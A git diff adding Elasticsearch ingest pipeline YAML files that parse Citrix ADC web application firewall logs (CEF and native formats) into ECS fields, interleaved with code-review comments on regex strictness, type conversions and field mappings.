@@ -0,0 +1,36 @@
+---
+description: Pipeline for Citrix Native messages of BOT feature.
+processors:
+ - grok:
+ description: Extract fields from message of BOT feature.
+ tag: grok_bot_feature
+ field: citrix.extended.message
+ patterns:
+ - '^Bot%{SPACE}New%{SPACE}Signature%{SPACE}Available.%{SPACE}Newly%{SPACE}added%{SPACE}Rules%{SPACE}:%{SPACE}%{INT:citrix_adc.log.newly_added_rules}%{SPACE}Deleted%{SPACE}Rules%{SPACE}:%{SPACE}%{INT:citrix_adc.log.deleted_rules}$'
+ - '%{GREEDYDATA:citrix_adc.log.message}'
+ ignore_failure: true
+ - convert:
+ field: citrix_adc.log.newly_added_rules
+ tag: convert_newly_added_rules_to_long
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: citrix_adc.log.deleted_rules
+ tag: convert_deleted_rules_to_long
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+on_failure:
+ - set:
+ field: event.kind
+ value: pipeline_error
+ - append:
+ field: error.message
+ value: '{{{ _ingest.on_failure_message }}}'
diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/cef.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/cef.yml
new file mode 100644
index 00000000000..e66243fdda8
--- /dev/null
+++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/cef.yml
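Review bot: In `grok_bot_feature` the dot in `Available.%{SPACE}Newly` is an unescaped regex metacharacter and so matches any character rather than the literal period; write it as `Available\.%{SPACE}Newly` so the pattern is as strict as the anchors suggest. The two `convert ... type: long` steps are needed here because `%{INT:...}` captures strings, unlike the `:int`-typed captures used in appfw_feature.yml, and a short comment above `patterns:` noting that would stop a future reader from "harmonising" the two files the wrong way.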
@@ -0,0 +1,134 @@
+---
+description: Pipeline for Citrix CEF messages.
+processors:
+ - set:
+ field: citrix.cef_format
+ tag: set_cef_format
+ value: true
+ # https://docs.citrix.com/en-us/citrix-adc/downloads/cef-log-components.pdf
+ - dissect:
+ field: citrix.detail
+ tag: dissect_detail
+ pattern: "CEF:%{citrix.cef_version}|%{citrix.device_vendor}|%{citrix.device_product}|%{citrix.device_version}|%{citrix.device_event_class_id}|%{citrix.name}|%{event.severity}|%{citrix.extended.message}"
+ - kv:
+ field: citrix.extended.message
+ tag: kv_extended_message
+ target_field: citrix.extended_kv
+ field_split: ' (?=[a-zA-Z][a-zA-Z0-9]*=)'
+ value_split: '='
+ ignore_missing: true
+ - remove:
+ field: citrix.extended
+ tag: remove_extended
+ if: ctx.citrix?.extended_kv != null
+
+ # https://docs.citrix.com/en-us/citrix-adc/current-release/application-firewall/logs.html#common-event-format-cef-logs
+ - convert:
+ # src – source IP address
+ field: citrix.extended_kv.src
+ tag: convert_extended_kv_src_to_ip
+ target_field: source.ip
+ type: ip
+ ignore_missing: true
+ - remove:
+ field: citrix.extended_kv.src
+ tag: remove_extended_kv_src
+ ignore_missing: true
+ - convert:
+ # spt – source port number
+ field: citrix.extended_kv.spt
+ tag: convert_extended_kv_spt_to_long
+ target_field: source.port
+ type: long
+ ignore_missing: true
+ - remove:
+ field: citrix.extended_kv.spt
+ tag: remove_extended_kv_spt
+ ignore_missing: true
+ - rename:
+ # method – Method (for example GET/POST)
+ field: citrix.extended_kv.method
+ tag: rename_extended_kv_method
+ target_field: http.request.method
+ ignore_missing: true
+ - rename:
+ # request – request URL
+ field: citrix.extended_kv.request
+ tag: rename_extended_kv_request
+ target_field: url.original
+ ignore_missing: true
+ - rename:
+ # action (for example blocked, transformed)
+ field: citrix.extended_kv.act
+ tag: rename_extended_kv_act
+ target_field: event.action
+ ignore_missing: true
+ - rename:
+ # message (Message regarding the observed security check violation)
+ field: citrix.extended_kv.msg
+ tag: rename_extended_kv_msg
+ target_field: message
+ ignore_missing: true
+ - rename:
+ # event ID
+ field: citrix.extended_kv.cn1
+ tag: rename_extended_kv_cn1
+ target_field: event.id
+ ignore_missing: true
+ - rename:
+ # HTTP Transaction ID
+ field: citrix.extended_kv.cn2
+ tag: rename_extended_kv_cn2
+ target_field: http.request.id
+ ignore_missing: true
+ - rename:
+ # profile name
+ field: citrix.extended_kv.cs1
+ tag: rename_extended_kv_cs1
+ target_field: citrix.profile_name
+ ignore_missing: true
+ - rename:
+ # PPE ID (for example PPE1)
+ field: citrix.extended_kv.cs2
+ tag: rename_extended_kv_cs2
+ target_field: citrix.ppe_id
+ ignore_missing: true
+ - rename:
+ # Session ID
+ field: citrix.extended_kv.cs3
+ tag: rename_extended_kv_cs3
+ target_field: citrix.session_id
+ ignore_missing: true
+ - rename:
+ # Severity (for example INFO, ALERT)
+ field: citrix.extended_kv.cs4
+ tag: rename_extended_kv_cs4
+ target_field: citrix.severity
+ ignore_missing: true
+ - rename:
+ # event year
+ field: citrix.extended_kv.cs5
+ tag: rename_extended_kv_cs5
+ target_field: citrix.event_year
+ ignore_missing: true
+ - rename:
+ # Signature Violation Category
+ field: citrix.extended_kv.cs6
+ tag: rename_extended_kv_cs6
+ target_field: citrix.signature_violation_category
+ ignore_missing: true
+
+ - rename:
+ field: citrix.extended_kv
+ tag: rename_extended_kv
+ target_field: citrix.extended
+ ignore_missing: true
+
+on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - set:
+ field: event.kind
+ tag: set_pipeline_error_to_event_kind
+ value: pipeline_error
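Review bot: `dissect_detail` writes the CEF header severity straight into `event.severity`, which is an ECS `long`, but dissect only produces strings and nothing later in this pipeline converts it, so the value will either be rejected by a strict mapping or indexed inconsistently with the other data streams; add `- convert:` / `field: event.severity` / `type: long` (with `ignore_missing: true`) right after the dissect, or dissect into a `citrix.*` field first. The dissect pattern and the `kv` split also assume no CEF escaping: an escaped pipe `\|` inside a header field shifts every column to the right, and an escaped `\=` in an extension value can be taken as a new key by the `' (?=[a-zA-Z][a-zA-Z0-9]*=)'` lookahead when it follows a space. That limitation deserves a comment next to `dissect_detail` so an operator who finds such an event in `error.message` knows it is a parser gap, not a corrupt log; `remove_extended` then drops the raw extension string on success, so the original text is recoverable only through the preserve_original_event tag.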
diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ci_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ci_feature.yml
new file mode 100644
index 00000000000..36ed1743616
--- /dev/null
+++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ci_feature.yml
@@ -0,0 +1,225 @@ +--- +description: Pipeline for Citrix Native messages of CI feature. +processors: + - grok: + description: Extract fields from message of CI feature. + tag: grok_ci_feature + field: citrix.extended.message + patterns: + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} - Domain %{DATA:citrix_adc.log.domain} - Content-Type %{DATA:citrix_adc.log.content_type} - ICAP%{SPACE}Server %{IP:citrix_adc.log.icap_server.ip}:%{INT:citrix_adc.log.icap_server.port} - Mode %{WORD:citrix_adc.log.mode} - Service %{WORD:citrix_adc.log.service} - Response %{INT:citrix_adc.log.response.code} - Action %{WORD:citrix_adc.log.action}$' + - '^ID %{NUMBER:citrix_adc.log.id} - Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} Protocol %{WORD:citrix_adc.log.protocol} - URL %{URI:citrix_adc.log.url} - Domain %{DATA:citrix_adc.log.domain} - Service %{DATA:citrix_adc.log.service} - %{DATA}%{SPACE}%{DATA} - Action %{WORD:citrix_adc.log.action} - Bytes%{SPACE}Sent %{NUMBER:citrix_adc.log.bytes.sent} - Bytes%{SPACE}Received %{NUMBER:citrix_adc.log.bytes.received} - Origin%{SPACE}Server %{IP:citrix_adc.log.icap_server.ip}:%{INT:citrix_adc.log.icap_server.port}$' + - '^ID %{NUMBER:citrix_adc.log.id} - Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} Protocol %{WORD:citrix_adc.log.protocol} - URL %{URI:citrix_adc.log.url} - Domain %{DATA:citrix_adc.log.domain} - Service %{DATA:citrix_adc.log.service} - %{DATA}%{SPACE}%{DATA} - Action %{WORD:citrix_adc.log.action} - Request%{SPACE}Bytes%{SPACE}Sent %{NUMBER:citrix_adc.log.request.bytes_sent} - Response%{SPACE}Bytes%{SPACE}Sent %{NUMBER:citrix_adc.log.response.bytes_sent} - Origin%{SPACE}Server 
%{IP:citrix_adc.log.origin_server.ip}:%{INT:citrix_adc.log.origin_server.port}$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - convert: + field: citrix_adc.log.bytes.received + tag: convert_bytes_received_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.bytes + tag: set_destination_bytes_from_bytes_received + copy_from: citrix_adc.log.bytes.received + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.ip + tag: convert_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.destination?.ip != null && ctx.citrix_adc.log.destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_destination_ip + copy_from: citrix_adc.log.destination.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.port + tag: convert_destination_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.port + tag: set_destination_port_from_destination_port + copy_from: citrix_adc.log.destination.port + ignore_empty_value: true + - set: + field: event.action + tag: set_event_action_from_action + copy_from: citrix_adc.log.action + ignore_empty_value: true + - convert: + 
field: citrix_adc.log.response.code + tag: convert_response_code_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: http.response.status_code + tag: set_http_response_status_code_from_response_code + copy_from: citrix_adc.log.response.code + ignore_empty_value: true + - set: + field: network.protocol + tag: set_network_protocol_from_protocol + copy_from: citrix_adc.log.protocol + ignore_empty_value: true + - convert: + field: citrix_adc.log.icap_server.ip + tag: convert_icap_server_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.icap_server?.ip != null && ctx.citrix_adc.log.icap_server.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.ip + tag: set_server_ip_from_icap_server_ip + copy_from: citrix_adc.log.icap_server.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.origin_server.ip + tag: convert_origin_server_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.origin_server?.ip != null && ctx.citrix_adc.log.origin_server.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.ip + tag: set_server_ip_from_origin_server_ip + copy_from: citrix_adc.log.origin_server.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.icap_server.port + tag: 
convert_icap_server_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.port + tag: set_server_port_from_icap_server_port + copy_from: citrix_adc.log.icap_server.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.origin_server.port + tag: convert_origin_server_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.port + tag: set_server_port_from_origin_server_port + copy_from: citrix_adc.log.origin_server.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.bytes.sent + tag: convert_bytes_sent_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.bytes + tag: set_source_bytes_from_bytes_sent + copy_from: citrix_adc.log.bytes.sent + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.ip + tag: convert_source_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.source?.ip != null && ctx.citrix_adc.log.source.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + 
field: source.ip + tag: set_source_ip_from_source_ip + copy_from: citrix_adc.log.source.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.port + tag: convert_source_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_source_port + copy_from: citrix_adc.log.source.port + ignore_empty_value: true + - set: + field: url.original + tag: set_url_original_from_url + copy_from: citrix_adc.log.url + ignore_empty_value: true + - set: + field: user.domain + tag: set_user_domain_from_domain + copy_from: citrix_adc.log.domain + ignore_empty_value: true + - convert: + field: citrix_adc.log.request.bytes_sent + tag: convert_request_bytes_sent_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.response.bytes_sent + tag: convert_response_bytes_sent_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.id + tag: convert_id_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: 
{{{_ingest.on_failure_message}}}' +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/cvpn_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/cvpn_feature.yml new file mode 100644 index 00000000000..81a052e0ca0 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/cvpn_feature.yml @@ -0,0 +1,35 @@ +--- +description: Pipeline for Citrix Native messages of CVPN feature. +processors: + - grok: + description: Extract fields from message of CVPN feature. + tag: grok_cvpn_feature + field: citrix.extended.message + patterns: + - '^HTML_URL %{URI:citrix_adc.log.html_url}$' + - '^REWRITTEN_URL %{URI:citrix_adc.log.rewritten_url}$' + - '^MATCHED_URL %{URI:citrix_adc.log.matched_url}$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - set: + field: url.original + tag: set_url_original_from_html_url + copy_from: citrix_adc.log.html_url + ignore_empty_value: true + - set: + field: url.original + tag: set_url_original_from_rewritten_url + copy_from: citrix_adc.log.rewritten_url + ignore_empty_value: true + - set: + field: url.original + tag: set_url_original_from_matched_url + copy_from: citrix_adc.log.matched_url + ignore_empty_value: true +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/default.yml new file mode 100644 index 00000000000..8a3315a25a4 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/default.yml 
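Review bot: The second pattern of grok_ci_feature captures the `Origin Server` address into `citrix_adc.log.icap_server.ip`/`.port`, while the third pattern captures the same token into `citrix_adc.log.origin_server.*`; the ECS `server.ip`/`server.port` come out the same either way through the two set processors, but for that message shape the `citrix_adc.log.icap_server` field will hold an origin-server address, which looks unintended. I would change the tail of the second pattern to `- Origin%{SPACE}Server %{IP:citrix_adc.log.origin_server.ip}:%{INT:citrix_adc.log.origin_server.port}$'`. Separately, the pipeline-level on_failure here appends only `'{{{ _ingest.on_failure_message }}}'`, whereas the handler in default.yml records processor type, tag and pipeline; using that richer message in this file, cvpn_feature.yml and dns_and_ssli_feature.yml would make pipeline_error documents attributable to a specific processor during triage.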
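Review bot: All three anchored patterns in grok_cvpn_feature depend on `%{URI}`, which in the standard grok library requires a scheme and rejects characters that rewritten CVPN URLs commonly carry; any such message silently falls through to `citrix_adc.log.message` with no url.original and no error, because the final `%{GREEDYDATA}` pattern always matches and ignore_failure is set. If that is not intended, a pipeline test sample for each of the HTML_URL, REWRITTEN_URL and MATCHED_URL forms would confirm the patterns match real device output, and a looser capture such as `%{GREEDYDATA:citrix_adc.log.rewritten_url}` may be safer for the rewritten form since uri_parts in default.yml guards on its own.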
@@ -0,0 +1,199 @@ +--- +description: Pipeline for Citrix Web App Firewall logs. +processors: + - set: + field: ecs.version + tag: set_ecs_version + value: '8.12.0' + - set: + field: observer.vendor + tag: set_observer_vendor + value: 'Citrix' + - set: + field: observer.product + tag: set_observer_product + value: 'Netscaler' + - set: + field: observer.type + tag: set_observer_type + value: 'firewall' + - rename: + field: message + tag: rename_message + target_field: event.original + ignore_missing: true + if: ctx.event?.original == null + - grok: + description: Extract header details and message from log line. + tag: grok_event_original + field: event.original + patterns: + - '^%{SYSLOG_TIMESTAMP}( %{LEVEL} %{IP:client.ip:ip})?( %{HOSTNAME:citrix.hostname})? %{GREEDYDATA:citrix.detail}' + - '^%{GREEDYDATA:citrix.detail}' + pattern_definitions: + LEVEL: '?' + IDENT: '[a-zA-Z][a-zA-Z0-9]*' + SYSLOG_TIMESTAMP: '(?:%{SYSLOGTIMESTAMP:_tmp.timestamp}|%{TIMESTAMP_ISO8601:_tmp.timestamp8601})' + TIMESTAMP_ISO8601: '%{YEAR}-%{MONTHNUM}-%{MONTHDAY}[T ]%{HOUR}:?%{MINUTE}(?::?%{SECOND})?%{ISO8601_TIMEZONE:event.timezone}?' 
+ - pipeline: + name: '{{ IngestPipeline "cef" }}' + tag: pipeline_cef + if: ctx.citrix?.detail != null && ctx.citrix.detail.startsWith("CEF:") + - pipeline: + name: '{{ IngestPipeline "native" }}' + tag: pipeline_native + if: ctx.citrix?.detail != null && !ctx.citrix.detail.startsWith("CEF:") + - convert: + field: event.severity + tag: convert_event_severity_to_long + type: long + ignore_missing: true + - set: + field: _conf.tz_offset + tag: set_tz_offset_utc + value: UTC + override: false + - set: + field: event.timezone + tag: set_event_timezone_from_tz_offset + copy_from: _conf.tz_offset + if: ctx.event?.timezone == null || ctx.event?.timezone == "" + - date: + if: ctx._tmp?.timestamp8601 != null + tag: date_tmp_timestamp8601 + field: _tmp.timestamp8601 + timezone: '{{{event.timezone}}}' + formats: + - ISO8601 + - set: + field: _tmp.timestamp + tag: set_tmp_timestamp + if: ctx._tmp?.timestamp != null && ctx.citrix?.event_year != null + value: "{{{citrix.event_year}}} {{{_tmp.timestamp}}}" + - date: + if: ctx._tmp?.timestamp != null + tag: date_tmp_timestamp + field: _tmp.timestamp + timezone: '{{{event.timezone}}}' + formats: + - MMM d HH:mm:ss + - MMM d HH:mm:ss + - MMM dd HH:mm:ss + - MMMM d HH:mm:ss + - MMMM d HH:mm:ss + - MMMM dd HH:mm:ss + - yyyy MMM d HH:mm:ss + - yyyy MMM d HH:mm:ss + - yyyy MMM dd HH:mm:ss + - yyyy MMMM d HH:mm:ss + - yyyy MMMM d HH:mm:ss + - yyyy MMMM dd HH:mm:ss + - date: + if: ctx._tmp?.timestamp_native != null + tag: date_tmp_timestamp_native + field: _tmp.timestamp_native + formats: + - MM/dd/yyyy:HH:mm:ss + - yyyy/MM/dd:HH:mm:ss + timezone: '{{{event.timezone}}}' + - remove: + field: citrix.event_year + tag: remove_event_year + ignore_missing: true + - geoip: + field: client.ip + tag: geoip_client_ip_to_client_geo + target_field: client.geo + ignore_missing: true + - geoip: + field: source.ip + tag: geoip_source_ip_to_source_geo + target_field: source.geo + ignore_missing: true + # IP Autonomous System (AS) Lookup + - geoip: + 
database_file: GeoLite2-ASN.mmdb + tag: geoip_source_ip_to_source_as + field: source.ip + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true + - geoip: + database_file: GeoLite2-ASN.mmdb + tag: geoip_client_ip_to_client_as + field: client.ip + target_field: client.as + properties: + - asn + - organization_name + ignore_missing: true + - rename: + field: source.as.asn + tag: rename_source_as_asn + target_field: source.as.number + ignore_missing: true + - rename: + field: source.as.organization_name + tag: rename_source_as_organization_name + target_field: source.as.organization.name + ignore_missing: true + - rename: + field: client.as.asn + tag: rename_client_as_asn + target_field: client.as.number + ignore_missing: true + - rename: + field: client.as.organization_name + tag: rename_client_as_organization_name + target_field: client.as.organization.name + ignore_missing: true + - uri_parts: + field: url.original + tag: uri_parts_url_original + target_field: url + if: ctx.url?.original != null && ctx.url?.original != "" + - script: + description: Drops null/empty values recursively + tag: drop_empty_fields + lang: painless + source: | + boolean dropEmptyFields(Object object) { + if (object == null || object == "") { + return true; + } else if (object instanceof Map) { + ((Map) object).values().removeIf(value -> dropEmptyFields(value)); + return (((Map) object).size() == 0); + } else if (object instanceof List) { + ((List) object).removeIf(value -> dropEmptyFields(value)); + return (((List) object).length == 0); + } + return false; + } + dropEmptyFields(ctx); + - remove: + field: event.original + tag: remove_event_original + if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) + ignore_missing: true + - remove: + field: + - _tmp + - _conf + tag: remove_tmp_and_conf + ignore_missing: true +on_failure: + - remove: + field: + - _tmp + - _conf + tag: remove_tmp_and_conf + ignore_missing: true + - append: + field: 
error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/dns_and_ssli_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/dns_and_ssli_feature.yml new file mode 100644 index 00000000000..cf8afc4a5d7 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/dns_and_ssli_feature.yml 
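Review bot: The `LEVEL: '?'` pattern definition in grok_event_original looks like a placeholder rather than a pattern: an unnamed `%{LEVEL}` expands to a bare `?` inside the optional group, so the header alternative effectively matches one or two spaces before the IP and captures no level, and depending on how the grok processor wraps unnamed sub-patterns it may even be rejected as a quantifier with no target. I would either define the real severity token and capture it into a `log.level`-style field, or drop `%{LEVEL} ` from the pattern, and add a pipeline test sample whose header carries the level so both the ISO8601 and syslog branches are exercised. `IDENT` is defined but referenced by no pattern. The two identical-looking `MMM d HH:mm:ss` entries in date_tmp_timestamp are presumably the single- and double-space day variants; a comment saying so would stop the next maintainer from deduplicating them.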
@@ -0,0 +1,105 @@ +--- +description: Pipeline for Citrix Native messages of DNS and SSLI feature. +processors: + - grok: + description: Extract fields from message of DNS and SSLI feature. + tag: grok_dns_and_ssli_feature + field: citrix.extended.message + patterns: + - '^Source %{IP:citrix_adc.log.source.ip}:%{INT:citrix_adc.log.source.port} - Destination %{IP:citrix_adc.log.destination.ip}:%{INT:citrix_adc.log.destination.port} User%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.user} - Domain%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.domain} - Category%{SPACE}:%{SPACE}%{INT:citrix_adc.log.category} Action%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.action} - Reason%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.reason}$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - convert: + field: citrix_adc.log.destination.ip + tag: convert_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.destination?.ip != null && ctx.citrix_adc.log.destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_destination_ip + copy_from: citrix_adc.log.destination.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.port + tag: convert_destination_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.port + tag: set_destination_port_from_destination_port + copy_from: citrix_adc.log.destination.port + ignore_empty_value: true + - set: + field: event.action + tag: 
set_event_action_from_action + copy_from: citrix_adc.log.action + ignore_empty_value: true + - set: + field: event.reason + tag: set_event_reason_from_reason + copy_from: citrix_adc.log.reason + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.ip + tag: convert_source_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.source?.ip != null && ctx.citrix_adc.log.source.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_source_ip + copy_from: citrix_adc.log.source.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.port + tag: convert_source_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_source_port + copy_from: citrix_adc.log.source.port + ignore_empty_value: true + - set: + field: user.domain + tag: set_user_domain_from_domain + copy_from: citrix_adc.log.domain + ignore_empty_value: true + - set: + field: user.name + tag: set_user_name_from_user + copy_from: citrix_adc.log.user + ignore_empty_value: true + - convert: + field: citrix_adc.log.category + tag: convert_category_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' +on_failure: + - set: + field: event.kind + value: 
pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ica_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ica_feature.yml new file mode 100644 index 00000000000..91ebb93ff81 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ica_feature.yml 
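Review bot: set_user_domain_from_domain copies `citrix_adc.log.domain` into `user.domain`, but in the DNS/SSLI message the `Domain :` token appears to be the queried or intercepted domain that the category and action decision was made on, not the user's authentication realm, so ECS consumers would read a filtered hostname as a user domain. `dns.question.name` for the DNS case, or `destination.domain`/`url.domain`, looks like the right home; the same mapping with the same tag appears in ci_feature.yml, where Domain sits next to the URL. The category value is captured as INT and then converted to string, which is fine for a code but worth a one-line comment such as `# category is an opaque filter code, keep as keyword` so it is not later "fixed" to long.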
